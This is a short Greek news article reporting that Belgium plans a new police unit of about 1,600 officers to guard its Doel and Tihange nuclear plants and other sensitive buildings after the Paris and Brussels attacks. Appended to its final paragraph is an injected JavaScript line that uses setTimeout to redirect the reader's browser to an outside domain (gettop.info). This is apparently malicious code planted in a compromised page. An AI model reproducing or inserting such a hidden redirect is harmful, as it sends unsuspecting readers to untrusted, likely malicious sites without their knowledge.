Βέλγιο: H αντιτρομοκρατική θα φυλάει τα πυρηνικά εργοστάσια υπό τον φόβο «χτυπήματος»

0
11

 

  Από το 2017, οι δύο μονάδες παραγωγής πυρηνικής ενέργειας του Βελγίου και άλλες εγκαταστάσεις στρατηγικής σημασίας για τη χώρα θα προστατεύονται από μια νέα δύναμη ταχείας αντίδρασης, ώστε να αντιμετωπιστεί μια ενδεχόμενη τρομοκρατική επίθεση, ανακοίνωσε το υπουργείο Εσωτερικών, επιβεβαιώνοντας πληροφορίες των βελγικών μέσων ενημέρωσης.

«Αποφασίσαμε να δημιουργήσουμε μια νέα μονάδα στους κόλπους της αστυνομίας που θα είναι υπεύθυνη για τη φύλαξη κτιρίων όπως πρεσβείες, δικαστήρια και πυρηνικά εργοστάσια» είπε η Αν-Λορ Μουλινιό, η εκπρόσωπος του υπουργού Εσωτερικών Γιαν Γιαμπόν.

Η νέα μονάδα θα αποτελείται από περίπου 1.600 αξιωματικούς της αστυνομίας και θα αναπτυχθεί εντός των προσεχών μηνών. Τα πυρηνικά εργοστάσια του Ντουλ, κοντά στην Αμβέρσα και του Τιάνζ, στην περιοχή της Λιέγης, έχουν τεθεί υπό τη φύλαξη 140 στρατιωτών, στο πλαίσιο της ενίσχυσης των μέτρων ασφαλείας που αποφασίστηκε μετά τις επιθέσεις στο Παρίσι, στα τέλη του περασμένου έτους, αλλά κυρίως μετά τις νέες επιθέσεις στις Βρυξέλλες, τον περασμένο Μάρτιο. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here